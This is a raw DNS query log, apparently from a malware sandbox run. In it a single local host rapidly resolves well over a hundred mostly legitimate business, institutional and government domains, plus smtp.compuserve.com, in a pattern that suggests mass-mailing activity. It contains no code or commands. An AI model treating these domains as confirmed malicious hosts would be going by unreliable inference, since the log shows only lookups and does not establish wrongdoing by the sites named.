Mar 22, 2023 05:45:35.537435055 CET	192.168.2.5	8.8.8.8	0x40f4	Standard query (0)	workplus.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.551975965 CET	192.168.2.5	8.8.8.8	0xd54f	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.556998968 CET	192.168.2.5	8.8.8.8	0xe31c	Standard query (0)	skypearl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.557687044 CET	192.168.2.5	8.8.8.8	0x1164	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.561194897 CET	192.168.2.5	8.8.8.8	0x3061	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.573370934 CET	192.168.2.5	8.8.8.8	0x3ee6	Standard query (0)	cnti.krsn.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.576159954 CET	192.168.2.5	8.8.8.8	0x233c	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.585206985 CET	192.168.2.5	8.8.8.8	0x5a52	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.595716000 CET	192.168.2.5	8.8.8.8	0xdd14	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.601874113 CET	192.168.2.5	8.8.8.8	0xd553	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.606686115 CET	192.168.2.5	8.8.8.8	0x21b8	Standard query (0)	wantapc.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.616224051 CET	192.168.2.5	8.8.8.8	0xdb52	Standard query (0)	kayoaiba.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.616574049 CET	192.168.2.5	8.8.8.8	0xfb75	Standard query (0)	sinwal.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.626492023 CET	192.168.2.5	8.8.8.8	0xe393	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.645786047 CET	192.168.2.5	8.8.8.8	0xa385	Standard query (0)	roewer.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.652693033 CET	192.168.2.5	8.8.8.8	0xa509	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.661180973 CET	192.168.2.5	8.8.8.8	0xb9ed	Standard query (0)	ntc.edu.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.663921118 CET	192.168.2.5	8.8.8.8	0x4ce9	Standard query (0)	bossinst.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.713480949 CET	192.168.2.5	8.8.8.8	0x456e	Standard query (0)	impexnc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.728961945 CET	192.168.2.5	8.8.8.8	0xad67	Standard query (0)	mkm-gr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.735306978 CET	192.168.2.5	8.8.8.8	0xa059	Standard query (0)	gbmfg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.748014927 CET	192.168.2.5	8.8.8.8	0xd684	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.753185034 CET	192.168.2.5	8.8.8.8	0x6299	Standard query (0)	stopllc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.765031099 CET	192.168.2.5	8.8.8.8	0x6f8d	Standard query (0)	mikihan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.765031099 CET	192.168.2.5	8.8.8.8	0x442e	Standard query (0)	fifa-ews.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.771819115 CET	192.168.2.5	8.8.8.8	0xbb62	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.797139883 CET	192.168.2.5	8.8.8.8	0xffef	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.842582941 CET	192.168.2.5	8.8.8.8	0xb386	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.859250069 CET	192.168.2.5	8.8.8.8	0xa0a	Standard query (0)	clinicasanluis.com.co	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.861325979 CET	192.168.2.5	8.8.8.8	0x6ac4	Standard query (0)	cbras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.863229990 CET	192.168.2.5	8.8.8.8	0x9cf	Standard query (0)	ccssinc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.866060972 CET	192.168.2.5	8.8.8.8	0x1464	Standard query (0)	dspears.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.932759047 CET	192.168.2.5	8.8.8.8	0xd57f	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.932813883 CET	192.168.2.5	8.8.8.8	0xd39a	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.948426962 CET	192.168.2.5	8.8.8.8	0xc6ea	Standard query (0)	msl-lock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.950906992 CET	192.168.2.5	8.8.8.8	0x976f	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.969075918 CET	192.168.2.5	8.8.8.8	0x6892	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.969075918 CET	192.168.2.5	8.8.8.8	0x4479	Standard query (0)	mikihan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.971106052 CET	192.168.2.5	8.8.8.8	0x139d	Standard query (0)	nlcv.bas.bg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.983465910 CET	192.168.2.5	8.8.8.8	0x60ba	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.985582113 CET	192.168.2.5	8.8.8.8	0xd658	Standard query (0)	wantapc.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.985582113 CET	192.168.2.5	8.8.8.8	0x21ef	Standard query (0)	komie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.005012989 CET	192.168.2.5	8.8.8.8	0x92bd	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.025331974 CET	192.168.2.5	8.8.8.8	0x9450	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.027806997 CET	192.168.2.5	8.8.8.8	0x9c67	Standard query (0)	htsmx.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.033045053 CET	192.168.2.5	8.8.8.8	0xd361	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.035917044 CET	192.168.2.5	8.8.8.8	0xd20d	Standard query (0)	nts-web.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.037539005 CET	192.168.2.5	8.8.8.8	0x803a	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.042561054 CET	192.168.2.5	8.8.8.8	0x11dc	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.042562008 CET	192.168.2.5	8.8.8.8	0xaac1	Standard query (0)	popbook.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.043411970 CET	192.168.2.5	8.8.8.8	0x5916	Standard query (0)	coxkitchensandbaths.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.052644968 CET	192.168.2.5	8.8.8.8	0x2dc9	Standard query (0)	x96.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.055238962 CET	192.168.2.5	8.8.8.8	0xd2b2	Standard query (0)	ccrsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.065315962 CET	192.168.2.5	8.8.8.8	0xa783	Standard query (0)	usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.073137999 CET	192.168.2.5	8.8.8.8	0x8e98	Standard query (0)	hazmatt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.073496103 CET	192.168.2.5	8.8.8.8	0x5d4d	Standard query (0)	from30ty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.082729101 CET	192.168.2.5	8.8.8.8	0xce3b	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.086240053 CET	192.168.2.5	8.8.8.8	0xda98	Standard query (0)	scintel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.106873035 CET	192.168.2.5	8.8.8.8	0x7c63	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.116136074 CET	192.168.2.5	8.8.8.8	0x8e9c	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.128098011 CET	192.168.2.5	8.8.8.8	0xd1bb	Standard query (0)	listel.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.133301973 CET	192.168.2.5	8.8.8.8	0x749	Standard query (0)	yhsll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.136823893 CET	192.168.2.5	8.8.8.8	0xdd21	Standard query (0)	metaforacom.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.141560078 CET	192.168.2.5	8.8.8.8	0x9fa7	Standard query (0)	kamptal.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.175853014 CET	192.168.2.5	8.8.8.8	0xe3a7	Standard query (0)	ccrsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.209461927 CET	192.168.2.5	8.8.8.8	0xf5b	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.213057041 CET	192.168.2.5	8.8.8.8	0xb4aa	Standard query (0)	kamptal.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.222048044 CET	192.168.2.5	8.8.8.8	0xb487	Standard query (0)	dhh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.222449064 CET	192.168.2.5	8.8.8.8	0xdd91	Standard query (0)	hes.pt	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.232284069 CET	192.168.2.5	8.8.8.8	0x246	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.249598980 CET	192.168.2.5	8.8.8.8	0xfc30	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.258104086 CET	192.168.2.5	8.8.8.8	0xbd19	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.300920010 CET	192.168.2.5	8.8.8.8	0x8f7b	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.317044973 CET	192.168.2.5	8.8.8.8	0x929a	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.317044973 CET	192.168.2.5	8.8.8.8	0xbfa4	Standard query (0)	ramkome.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.343645096 CET	192.168.2.5	8.8.8.8	0x9746	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.347863913 CET	192.168.2.5	8.8.8.8	0x5bb9	Standard query (0)	nlcv.bas.bg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.363269091 CET	192.168.2.5	8.8.8.8	0xa0c8	Standard query (0)	fortknox.bm	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.410022974 CET	192.168.2.5	8.8.8.8	0xf7f3	Standard query (0)	wahw.com.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.421567917 CET	192.168.2.5	8.8.8.8	0x4557	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.421674967 CET	192.168.2.5	8.8.8.8	0x6028	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.441606045 CET	192.168.2.5	8.8.8.8	0x376d	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.441606045 CET	192.168.2.5	8.8.8.8	0x609c	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.473141909 CET	192.168.2.5	8.8.8.8	0x4db3	Standard query (0)	fundeo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.487660885 CET	192.168.2.5	8.8.8.8	0xae3f	Standard query (0)	semuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.502959967 CET	192.168.2.5	8.8.8.8	0x4760	Standard query (0)	mackusick.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.539067984 CET	192.168.2.5	8.8.8.8	0x5422	Standard query (0)	likangds.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.539067984 CET	192.168.2.5	8.8.8.8	0xccaf	Standard query (0)	icd-host.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.542418003 CET	192.168.2.5	8.8.8.8	0xcb1f	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.562305927 CET	192.168.2.5	8.8.8.8	0x1164	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.597938061 CET	192.168.2.5	8.8.8.8	0x8191	Standard query (0)	magicomm.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.597938061 CET	192.168.2.5	8.8.8.8	0xec36	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.609749079 CET	192.168.2.5	8.8.8.8	0x1b65	Standard query (0)	dyag-eng.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.659583092 CET	192.168.2.5	8.8.8.8	0xa7ae	Standard query (0)	esmoke.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.673135042 CET	192.168.2.5	8.8.8.8	0x35f8	Standard query (0)	ldh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.675800085 CET	192.168.2.5	8.8.8.8	0x364b	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.693322897 CET	192.168.2.5	8.8.8.8	0xa842	Standard query (0)	indonesiamedia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.706780910 CET	192.168.2.5	8.8.8.8	0x41f7	Standard query (0)	usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.718993902 CET	192.168.2.5	8.8.8.8	0x2245	Standard query (0)	bggs.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.724060059 CET	192.168.2.5	8.8.8.8	0xd53c	Standard query (0)	xult.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.739274025 CET	192.168.2.5	8.8.8.8	0xb478	Standard query (0)	rtcasey.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.742935896 CET	192.168.2.5	8.8.8.8	0xd910	Standard query (0)	dwid.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.785281897 CET	192.168.2.5	8.8.8.8	0xea55	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.787112951 CET	192.168.2.5	8.8.8.8	0x19ca	Standard query (0)	strazynski.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.799243927 CET	192.168.2.5	8.8.8.8	0xf771	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.813637018 CET	192.168.2.5	8.8.8.8	0xdcfe	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.819844961 CET	192.168.2.5	8.8.8.8	0x24e7	Standard query (0)	revoldia.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.831904888 CET	192.168.2.5	8.8.8.8	0x9a58	Standard query (0)	rtcasey.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.846875906 CET	192.168.2.5	8.8.8.8	0x79f6	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.864984035 CET	192.168.2.5	8.8.8.8	0x7cb2	Standard query (0)	hamaker.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.878792048 CET	192.168.2.5	8.8.8.8	0xf0e7	Standard query (0)	hyab.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.895961046 CET	192.168.2.5	8.8.8.8	0x7534	Standard query (0)	cnti.krsn.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.909492016 CET	192.168.2.5	8.8.8.8	0x5849	Standard query (0)	burstner.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.940680981 CET	192.168.2.5	8.8.8.8	0xab50	Standard query (0)	fogra.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.969289064 CET	192.168.2.5	8.8.8.8	0x6892	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.974531889 CET	192.168.2.5	8.8.8.8	0x6f25	Standard query (0)	flamingorecordings.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.980727911 CET	192.168.2.5	8.8.8.8	0xd043	Standard query (0)	from30ty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.071763039 CET	192.168.2.5	8.8.8.8	0xc494	Standard query (0)	paraski.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.082530975 CET	192.168.2.5	8.8.8.8	0xe210	Standard query (0)	diamir.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.110413074 CET	192.168.2.5	8.8.8.8	0x1dbb	Standard query (0)	skgm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.177635908 CET	192.168.2.5	8.8.8.8	0xb769	Standard query (0)	muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.188801050 CET	192.168.2.5	8.8.8.8	0x4770	Standard query (0)	kevyt.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.227168083 CET	192.168.2.5	8.8.8.8	0x2d60	Standard query (0)	riwn.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.238706112 CET	192.168.2.5	8.8.8.8	0x8105	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.258722067 CET	192.168.2.5	8.8.8.8	0x4bfd	Standard query (0)	assideum.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.274209976 CET	192.168.2.5	8.8.8.8	0xfc30	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.290942907 CET	192.168.2.5	8.8.8.8	0x8f7b	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.297796011 CET	192.168.2.5	8.8.8.8	0x4d2e	Standard query (0)	scip.org.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.311212063 CET	192.168.2.5	8.8.8.8	0xcff8	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.313170910 CET	192.168.2.5	8.8.8.8	0xfa4e	Standard query (0)	www.diamir.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.318103075 CET	192.168.2.5	8.8.8.8	0x72cc	Standard query (0)	hazmatt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.319529057 CET	192.168.2.5	8.8.8.8	0x6ea2	Standard query (0)	orlyhotel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.320924997 CET	192.168.2.5	8.8.8.8	0xa2f3	Standard query (0)	www.muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.326555967 CET	192.168.2.5	8.8.8.8	0x5d43	Standard query (0)	t-trust.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.346399069 CET	192.168.2.5	8.8.8.8	0x9746	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.396600962 CET	192.168.2.5	8.8.8.8	0x599d	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.453726053 CET	192.168.2.5	8.8.8.8	0x609c	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.459702969 CET	192.168.2.5	8.8.8.8	0xaded	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.471738100 CET	192.168.2.5	8.8.8.8	0x3e51	Standard query (0)	gujarat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.487868071 CET	192.168.2.5	8.8.8.8	0x55ee	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.495872974 CET	192.168.2.5	8.8.8.8	0x80c8	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.555541039 CET	192.168.2.5	8.8.8.8	0x71f6	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.568469048 CET	192.168.2.5	8.8.8.8	0x23b0	Standard query (0)	arowines.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.580621958 CET	192.168.2.5	8.8.8.8	0x768f	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.582106113 CET	192.168.2.5	8.8.8.8	0x1164	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.584773064 CET	192.168.2.5	8.8.8.8	0x2917	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.593565941 CET	192.168.2.5	8.8.8.8	0xec36	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.599250078 CET	192.168.2.5	8.8.8.8	0x8191	Standard query (0)	magicomm.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.606112957 CET	192.168.2.5	8.8.8.8	0xdb6c	Standard query (0)	cnti.krsn.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.660427094 CET	192.168.2.5	8.8.8.8	0x2481	Standard query (0)	tabbles.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.714123011 CET	192.168.2.5	8.8.8.8	0xb4cd	Standard query (0)	rappich.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.714386940 CET	192.168.2.5	8.8.8.8	0x38e1	Standard query (0)	orbitgas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.720788002 CET	192.168.2.5	8.8.8.8	0x28e9	Standard query (0)	dataform.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.724931955 CET	192.168.2.5	8.8.8.8	0xa3e7	Standard query (0)	umcor.am	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.908154011 CET	192.168.2.5	8.8.8.8	0xc93d	Standard query (0)	dwid.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.969871998 CET	192.168.2.5	8.8.8.8	0xced7	Standard query (0)	mjrcpas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.984029055 CET	192.168.2.5	8.8.8.8	0x6f25	Standard query (0)	flamingorecordings.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.985208035 CET	192.168.2.5	8.8.8.8	0x6892	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.035398960 CET	192.168.2.5	8.8.8.8	0xc5ae	Standard query (0)	kamptal.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.051219940 CET	192.168.2.5	8.8.8.8	0xf4f3	Standard query (0)	nekono.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.111712933 CET	192.168.2.5	8.8.8.8	0x542c	Standard query (0)	lyto.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.131433964 CET	192.168.2.5	8.8.8.8	0xbf47	Standard query (0)	jabian.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.131433964 CET	192.168.2.5	8.8.8.8	0xc5f6	Standard query (0)	yasuma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.133886099 CET	192.168.2.5	8.8.8.8	0x7eca	Standard query (0)	fdlymca.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.253999949 CET	192.168.2.5	8.8.8.8	0xac93	Standard query (0)	603888.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.269531965 CET	192.168.2.5	8.8.8.8	0xe7e9	Standard query (0)	simetar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.312387943 CET	192.168.2.5	8.8.8.8	0x8f7b	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.315498114 CET	192.168.2.5	8.8.8.8	0x9946	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.364124060 CET	192.168.2.5	8.8.8.8	0x51fa	Standard query (0)	scintel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.459920883 CET	192.168.2.5	8.8.8.8	0x5bb4	Standard query (0)	hyab.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.471260071 CET	192.168.2.5	8.8.8.8	0xaded	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.486823082 CET	192.168.2.5	8.8.8.8	0x80c8	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.499847889 CET	192.168.2.5	8.8.8.8	0x2721	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.499847889 CET	192.168.2.5	8.8.8.8	0xd76b	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.528275013 CET	192.168.2.5	8.8.8.8	0x3e63	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.633342981 CET	192.168.2.5	8.8.8.8	0x77e	Standard query (0)	bount.com.tw	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.681417942 CET	192.168.2.5	8.8.8.8	0xb892	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.717803955 CET	192.168.2.5	8.8.8.8	0x62fa	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.721309900 CET	192.168.2.5	8.8.8.8	0xec1a	Standard query (0)	smtp.compuserve.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.725378990 CET	192.168.2.5	8.8.8.8	0x28c1	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.747308969 CET	192.168.2.5	8.8.8.8	0xc38	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.831031084 CET	192.168.2.5	8.8.8.8	0x7629	Standard query (0)	tozzhin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.847383022 CET	192.168.2.5	8.8.8.8	0x960d	Standard query (0)	onzcda.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.851917028 CET	192.168.2.5	8.8.8.8	0x1e2d	Standard query (0)	hyabmagneter.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.864026070 CET	192.168.2.5	8.8.8.8	0x484e	Standard query (0)	tcpoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.873225927 CET	192.168.2.5	8.8.8.8	0x78d3	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.992268085 CET	192.168.2.5	8.8.8.8	0x5fdc	Standard query (0)	fr-dat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.001130104 CET	192.168.2.5	8.8.8.8	0x6f25	Standard query (0)	flamingorecordings.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.027746916 CET	192.168.2.5	8.8.8.8	0xec7d	Standard query (0)	hbfuels.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.082076073 CET	192.168.2.5	8.8.8.8	0x93b0	Standard query (0)	skgm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.082077026 CET	192.168.2.5	8.8.8.8	0xffaf	Standard query (0)	uster.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.130223036 CET	192.168.2.5	8.8.8.8	0x82da	Standard query (0)	www.hyabmagneter.se	A (IP address)	IN (0x0001)	false
